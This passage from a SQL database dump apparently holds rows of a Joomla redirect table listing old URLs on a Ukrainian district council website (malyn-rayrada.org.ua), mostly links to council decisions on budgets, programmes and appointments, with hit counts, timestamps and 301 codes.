00:00:00',301),(16176,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/105-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2010','','','',28,0,'2015-11-01 09:47:32','0000-00-00 00:00:00',301),(16177,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/99-pro-utvorennja-prezidii-rajonnoi-radi','','','',32,0,'2015-11-01 09:47:52','0000-00-00 00:00:00',301),(16178,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/315-pro-vnesennja-zmin-do-programi-vidpochinku-ta','','','',20,0,'2015-11-01 09:48:10','0000-00-00 00:00:00',301),(16179,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/316-pro-zatverdzhennja-rajonnoi-programi_2','','','',57,0,'2015-11-01 09:48:20','0000-00-00 00:00:00',301),(16180,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/317-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_3','','','',22,0,'2015-11-01 09:48:29','0000-00-00 00:00:00',301),(16181,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/318-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_4','','','',15,0,'2015-11-01 09:48:39','0000-00-00 00:00:00',301),(16182,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/321-pro-stan-vikonannja-dohidnoi-chastini-rajonnogo','','','',17,0,'2015-11-01 09:48:57','0000-00-00 00:00:00',301),(16183,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16082013-/585-pro-zgodu-na-peredachu-mizhbjudzhetnogo-transfertu','','','',24,0,'2015-11-01 09:49:06','0000-00-00 00:00:00',301),(16184,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/119-pro-zatverdzhennja-rajonnogo-bjudzhetu-na-2012-rik','','','',14,0,'2015-11-01 09:49:24','0000-00-00 00:00:00',301),(16185,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/33-pro-nadannja-dozvolu-teritorialnomu-centru','','','',32,0,'2015-11-01 09:50:09','0000-00-00 00:00:00',301),(16186,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/827-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_7','','','',22,0,'2015-11-01 09:51:13','0000-00-00 00:00:00',301),(16187,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/831-pro-obrannja-zastupnika-golovi-rajonnoi-radi_2','','','',45,0,'2015-11-01 09:51:31','0000-00-00 00:00:00',301),(16188,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/833-pro-pidtrimku-vijskovosluzhbovciv-zhiteliv','','','',25,0,'2015-11-01 09:51:40','0000-00-00 00:00:00',301),(16189,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/834-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_3','','','',19,0,'2015-11-01 09:51:50','0000-00-00 00:00:00',301),(16190,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/155-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_3','','','',24,0,'2015-11-01 09:51:59','0000-00-00 00:00:00',301),(16191,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/24-pro-zatverdzhennja-programi-reformuvannja-i','','','',54,0,'2015-11-01 09:52:08','0000-00-00 00:00:00',301),(16192,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/50-pro-peredachu-knigi','','','',22,0,'2015-11-01 09:52:26','0000-00-00 00:00:00',301),(16193,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/53-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_2','','','',22,0,'2015-11-01 09:52:43','0000-00-00 00:00:00',301),(16194,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/324-pro-zatverdzhennja-rajonnoi-programi-shhodo','','','',23,0,'2015-11-01 09:53:01','0000-00-00 00:00:00',301),(16195,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/402-pro-zatverdzhennja-rajonnogo-bjudzhetu-na-2013-rik','','','',85,0,'2015-11-01 09:53:10','0000-00-00 00:00:00',301),(16196,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/443-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_6','','','',12,0,'2015-11-01 09:53:18','0000-00-00 00:00:00',301),(16197,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--23042013-/524-pro-zatverdzhennja-rezultativ-aukcionnih-torgiv-z_2','','','',17,0,'2015-11-01 09:53:45','0000-00-00 00:00:00',301),(16198,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/148-pro-priznachennja-kerivnika-komunalnogo','','','',25,0,'2015-11-01 09:54:11','0000-00-00 00:00:00',301),(16199,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/152-pro-peredachu-neruhomogo-majna','','','',15,0,'2015-11-01 09:54:19','0000-00-00 00:00:00',301),(16200,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/342-pro-zatverdzhennja-polozhennja-pro-teritorialnij','','','',52,0,'2015-11-01 09:54:28','0000-00-00 00:00:00',301),(16201,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/59-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_2','','','',16,0,'2015-11-01 09:54:37','0000-00-00 00:00:00',301),(16202,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/598-pro-pogodzhennja-priznachennja-na-posadu-direktora_3','','','',26,0,'2015-11-01 09:54:46','0000-00-00 00:00:00',301),(16203,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/634-pro-pogodzhennja-peredachi-v-orendu-primishhen-pid','','','',31,0,'2015-11-01 09:55:03','0000-00-00 00:00:00',301),(16204,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/639-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_3','','','',27,0,'2015-11-01 09:55:31','0000-00-00 00:00:00',301),(16205,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/306-pro-rozgljad-protestu-prokurora-malinskogo-rajonu_3','','','',55,0,'2015-11-01 09:56:27','0000-00-00 00:00:00',301),(16206,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/307-pro-pogodzhennja-otrimannja-specialnogo-dozvolu-na','','','',43,0,'2015-11-01 09:56:36','0000-00-00 00:00:00',301),(16207,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/221-pro-zvit-kerivnika-komunalnogo-pidpriemstva','','','',108,0,'2015-11-01 09:56:59','0000-00-00 00:00:00',301),(16208,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/230-pro-vnesennja-zmin-do-rajonnoi-programi-shhodo','','','',28,0,'2015-11-01 09:57:13','0000-00-00 00:00:00',301),(16209,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/235-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_3','','','',17,0,'2015-11-01 09:57:29','0000-00-00 00:00:00',301),(16210,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/236-pro-utvorennja-deputatskoi-grupi-ridna-malinshhina','','','',32,0,'2015-11-01 09:57:40','0000-00-00 00:00:00',301),(16211,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/283-pro-zvernennja-deputativ-malinskoi-rajonnoi-radi','','','',26,0,'2015-11-01 09:57:50','0000-00-00 00:00:00',301),(16212,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/666-pro-zvernennja-shhodo-zabezpechennja-socialnih','','','',18,0,'2015-11-01 09:58:19','0000-00-00 00:00:00',301),(16213,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/667-pro-nadannja-prava-malinskij-rajonnij-radi','','','',36,0,'2015-11-01 09:58:28','0000-00-00 00:00:00',301),(16214,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/668-pro-zatverdzhennja-rozporjadzhennja-golovi_2','','','',25,0,'2015-11-01 09:58:40','0000-00-00 00:00:00',301),(16215,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/669-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_4','','','',14,0,'2015-11-01 09:58:50','0000-00-00 00:00:00',301),(16216,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/784-pro-vnesennja-zmin-do-programi-vidpochinku-ta_2','','','',22,0,'2015-11-01 09:59:00','0000-00-00 00:00:00',301),(16217,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/785-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_2','','','',18,0,'2015-11-01 09:59:17','0000-00-00 00:00:00',301),(16218,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/793-pro-zvernennja-do-malinskoi-miskoi-radi','','','',14,0,'2015-11-01 09:59:46','0000-00-00 00:00:00',301),(16219,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/795-pro-zvernennja-do-malinskoi-miskoi-radi_2','','','',23,0,'2015-11-01 10:00:02','0000-00-00 00:00:00',301),(16220,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/171-pro-programu-socialno-ekonomichnogo-rozvitku','','','',12,0,'2015-11-01 10:00:10','0000-00-00 00:00:00',301),(16221,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/72-pro-rajonnij-bjudzhet-na-2011-rik','','','',54,0,'2015-11-01 10:00:17','0000-00-00 00:00:00',301),(16222,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/84-rishennja-prijnjati-na-3-sesii-rajonnoi-radi-6','','','',38,0,'2015-11-01 10:00:26','0000-00-00 00:00:00',301),(16223,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/131-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_2','','','',17,0,'2015-11-01 10:00:33','0000-00-00 00:00:00',301),(16224,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/176-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_5','','','',36,0,'2015-11-01 10:00:50','0000-00-00 00:00:00',301),(16225,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/177-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_6','','','',34,0,'2015-11-01 10:00:58','0000-00-00 00:00:00',301),(16226,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/178-pro-spisannja-osnovnih-zasobiv','','','',45,0,'2015-11-01 10:01:06','0000-00-00 00:00:00',301),(16227,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/179-pro-nadannja-zgodi-na-peredachu-traktora','','','',30,0,'2015-11-01 10:01:15','0000-00-00 00:00:00',301),(16228,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/180-pro-zvernennja-deputativ-rajonnoi-radi','','','',41,0,'2015-11-01 10:01:23','0000-00-00 00:00:00',301),(16229,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=14','','','',16,0,'2015-11-01 10:01:37','0000-00-00 00:00:00',301),(16230,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=21','','','',10,0,'2015-11-01 10:01:46','0000-00-00 00:00:00',301),(16231,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/493-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi_3','','','',23,0,'2015-11-01 10:02:17','0000-00-00 00:00:00',301),(16232,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/494-pro-vnesennja-zmin-u-dodatok-do-rishennja-rajonnoi','','','',28,0,'2015-11-01 10:02:31','0000-00-00 00:00:00',301),(16233,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/495-pro-docilnist-perebuvannja-na-posadi-nachalnika','','','',25,0,'2015-11-01 10:02:41','0000-00-00 00:00:00',301),(16234,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/260-pro-spisannja-osnovnih-zasobiv_2','','','',45,0,'2015-11-01 10:03:12','0000-00-00 00:00:00',301),(16235,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/261-pro-vnesennja-zmin-do-rishen-rajonnoi-radi-vid-19','','','',20,0,'2015-11-01 10:03:21','0000-00-00 00:00:00',301),(16236,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/267-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_10','','','',12,0,'2015-11-01 10:03:46','0000-00-00 00:00:00',301),(16237,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/268-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_3','','','',49,0,'2015-11-01 10:03:58','0000-00-00 00:00:00',301),(16238,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/63-pro-utvorennja-robochoi-komisii-z-pidgotovki','','','',30,0,'2015-11-01 10:04:09','0000-00-00 00:00:00',301),(16239,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/64-pro-obrannja-zastupnika-golovi-rajonnoi-radi','','','',40,0,'2015-11-01 10:04:16','0000-00-00 00:00:00',301),(16240,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/65-pro-vstanovlennja-nadbavki','','','',22,0,'2015-11-01 10:04:22','0000-00-00 00:00:00',301),(16241,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/66-pro-utvorennja-postijnih-komisij-rajonnoi-radi','','','',45,0,'2015-11-01 10:04:30','0000-00-00 00:00:00',301),(16242,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/67-pro-zatverdzhennja-strukturi-ta-chiselnosti','','','',15,0,'2015-11-01 10:04:38','0000-00-00 00:00:00',301),(16243,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/125-porjadok-dennij-4-sesii-6-sklikannja','','','',80,0,'2015-11-01 10:04:44','0000-00-00 00:00:00',301),(16244,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/126-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo','','','',41,0,'2015-11-01 10:04:52','0000-00-00 00:00:00',301),(16245,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/127-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011','','','',14,0,'2015-11-01 10:04:58','0000-00-00 00:00:00',301),(16246,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/129-pro-rozpodil-vikoristannja-koshtiv-shho-nadhodjat','','','',14,0,'2015-11-01 10:05:10','0000-00-00 00:00:00',301),(16247,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/867-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-15-grudnya-2010-roku-12-pro-utvorennya-prezidiji-rajonnoji-radi','','','',15,0,'2015-11-01 10:05:30','0000-00-00 00:00:00',301),(16249,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/871-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-nadaetsya-v-orendu-ripenku-m-v','','','',34,0,'2015-11-01 10:06:04','0000-00-00 00:00:00',301),(16250,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/872-pro-vnesennya-zmin-do-programi-zajnyatosti-naselennya-malinskogo-rajonu-na-period-do-2017roku','','','',21,0,'2015-11-01 10:06:10','0000-00-00 00:00:00',301),(16251,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014?start=7','','','',45,0,'2015-11-01 10:06:20','0000-00-00 00:00:00',301),(16252,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/983-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',18,0,'2015-11-01 10:06:32','0000-00-00 00:00:00',301),(16253,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/985-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',37,0,'2015-11-01 10:06:45','0000-00-00 00:00:00',301),(16254,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/996-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',24,0,'2015-11-01 10:07:06','0000-00-00 00:00:00',301),(16255,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/997-pro-vstanovlennya-nadbavki-do-posadovogo-okladu-premiyuvannya-ta-nadannya-materialnoji-dopomogi-golovi-rajonnoji-radi-ta-zastupniku-golovi-rajonnoji-radi-','','','',1,0,'2015-11-01 10:07:16','0000-00-00 00:00:00',301),(16256,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/999-pro-rajonnij-byudzhet-na-2015-rik','','','',21,0,'2015-11-01 10:07:35','0000-00-00 00:00:00',301),(16257,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku?start=14','','','',22,0,'2015-11-01 10:07:46','0000-00-00 00:00:00',301),(16258,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1093-pro-perspektivi-aministrativno-teritorialnoji-reformi-vidpovidno-do-zakonu-ukrajini-pro-dobrovilne-ob-ednannya-teritorialnikh-gromad','','','',20,0,'2015-11-01 10:08:10','0000-00-00 00:00:00',301),(16259,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1094-pro-vnesennya-zmin-do-polozhennya-pro-pochesnu-gramotu-ta-gramotu-malinskoji-rajonnoji-radi-zatverdzhenogo-rishennyam-rajonnoji-radi-vid-26-grudnya-2001-','','','',1,0,'2015-11-01 10:08:23','0000-00-00 00:00:00',301),(16260,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1095-pro-zatverdzhennya-rezultativ-auktsionnikh-torgiv-z-prodazhu-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',19,0,'2015-11-01 10:08:34','0000-00-00 00:00:00',301),(16261,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1010-pro-zatverdzhennya-zvitu-pro-vikonannya-rajonnogo-byudzhetu-za-2014-rik','','','',14,0,'2015-11-01 10:08:57','0000-00-00 00:00:00',301),(16262,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/880-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',41,0,'2015-11-01 10:09:36','0000-00-00 00:00:00',301),(16263,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1051-pro-zakhodi-shchodo-zberezhennya-isnuyuchoji-merezhi-avtomobilnikh-dorig-rajonu','','','',23,0,'2015-11-01 10:10:07','0000-00-00 00:00:00',301),(16264,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1053-pro-zvernennya-do-zhitomirskoji-oblasnoji-radi','','','',18,0,'2015-11-01 10:10:31','0000-00-00 00:00:00',301),(16265,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1056-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',22,0,'2015-11-01 10:10:42','0000-00-00 00:00:00',301),(16267,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/537-pro-vnesennja-zmin-do-pereliku-ob’ektiv-spilnoi','','','',15,0,'2015-11-01 10:11:53','0000-00-00 00:00:00',301),(16268,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1020-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu','','','',5,0,'2015-11-01 10:12:17','0000-00-00 00:00:00',301),(16269,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1023-pro-zatverdzhennya-zvitu-pro-otsinka-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-01 10:12:19','0000-00-00 00:00:00',301),(16270,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1024-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',5,0,'2015-11-01 10:12:21','0000-00-00 00:00:00',301),(16271,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=530:-4050-vi-l-r-1-2013-&lang=en&option=com_content&view=article','','','',3,0,'2015-11-01 10:15:33','0000-00-00 00:00:00',301),(16272,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/913-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',16,0,'2015-11-01 10:34:07','0000-00-00 00:00:00',301),(16274,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=ru','','','',5,0,'2015-11-01 10:48:59','0000-00-00 00:00:00',301),(16275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&lang=uk&Itemid=','','','',1,0,'2015-11-01 10:51:53','0000-00-00 00:00:00',301),(16276,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/489-pro-zatverdzhennja-polozhennja-pro-teritorialnij_2','','','',13,0,'2015-11-01 11:14:43','0000-00-00 00:00:00',301),(16277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=30&Itemid=61&lang=en','','','',11,0,'2015-11-01 11:24:52','0000-00-00 00:00:00',301),(16278,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=30&Itemid=61&lang=ru','','','',29,0,'2015-11-01 11:24:53','0000-00-00 00:00:00',301),(16279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=32&Itemid=64&lang=en','','','',12,0,'2015-11-01 11:24:58','0000-00-00 00:00:00',301),(16280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=32&Itemid=64&lang=ru','','','',43,0,'2015-11-01 11:24:59','0000-00-00 00:00:00',301),(16281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=en','','','',5,0,'2015-11-01 11:25:03','0000-00-00 00:00:00',301),(16282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=ru','','','',14,0,'2015-11-01 11:25:05','0000-00-00 00:00:00',301),(16283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=69&lang=en','','','',6,0,'2015-11-01 11:25:06','0000-00-00 00:00:00',301),(16284,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=69&lang=ru','','','',15,0,'2015-11-01 11:25:08','0000-00-00 00:00:00',301),(16285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=en','','','',52,0,'2015-11-01 11:25:09','0000-00-00 00:00:00',301),(16286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=ru','','','',9,0,'2015-11-01 11:25:11','0000-00-00 00:00:00',301),(16287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=ru','','','',9,0,'2015-11-01 11:25:15','0000-00-00 00:00:00',301),(16288,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=41&Itemid=78&lang=en','','','',14,0,'2015-11-01 11:25:20','0000-00-00 00:00:00',301),(16289,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=en','','','',9,0,'2015-11-01 11:25:28','0000-00-00 00:00:00',301),(16290,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=ru','','','',10,0,'2015-11-01 11:25:29','0000-00-00 00:00:00',301),(16291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=44&Itemid=83&lang=ru','','','',39,0,'2015-11-01 11:25:32','0000-00-00 00:00:00',301),(16292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=en','','','',11,0,'2015-11-01 11:25:34','0000-00-00 00:00:00',301),(16293,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=ru','','','',14,0,'2015-11-01 11:25:35','0000-00-00 00:00:00',301),(16294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=en','','','',41,0,'2015-11-01 11:25:37','0000-00-00 00:00:00',301),(16295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=ru','','','',45,0,'2015-11-01 11:25:38','0000-00-00 00:00:00',301),(16296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=en','','','',11,0,'2015-11-01 11:25:40','0000-00-00 00:00:00',301),(16297,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=48&Itemid=87&lang=en','','','',16,0,'2015-11-01 11:25:42','0000-00-00 00:00:00',301),(16298,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=48&Itemid=87&lang=ru','','','',31,0,'2015-11-01 11:25:44','0000-00-00 00:00:00',301),(16299,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=ru','','','',21,0,'2015-11-01 11:25:47','0000-00-00 00:00:00',301),(16300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=50&Itemid=90&lang=en','','','',9,0,'2015-11-01 11:25:49','0000-00-00 00:00:00',301),(16301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=en','','','',5,0,'2015-11-01 11:25:53','0000-00-00 00:00:00',301),(16302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=ru','','','',24,0,'2015-11-01 11:25:54','0000-00-00 00:00:00',301),(16303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=52&Itemid=93&lang=en','','','',31,0,'2015-11-01 11:25:55','0000-00-00 00:00:00',301),(16304,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=52&Itemid=93&lang=ru','','','',8,0,'2015-11-01 11:25:57','0000-00-00 00:00:00',301),(16305,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=en','','','',24,0,'2015-11-01 11:25:58','0000-00-00 00:00:00',301),(16306,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=ru','','','',9,0,'2015-11-01 11:26:03','0000-00-00 00:00:00',301),(16307,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=57&Itemid=98&lang=ru','','','',14,0,'2015-11-01 11:26:06','0000-00-00 00:00:00',301),(16308,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=485:-136-&catid=11&Itemid=14&lang=uk','','','',3,0,'2015-11-01 11:27:50','0000-00-00 00:00:00',301),(16309,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/659-pro-pochatok-navchalnogo-procesu-u','','','',18,0,'2015-11-01 11:28:49','0000-00-00 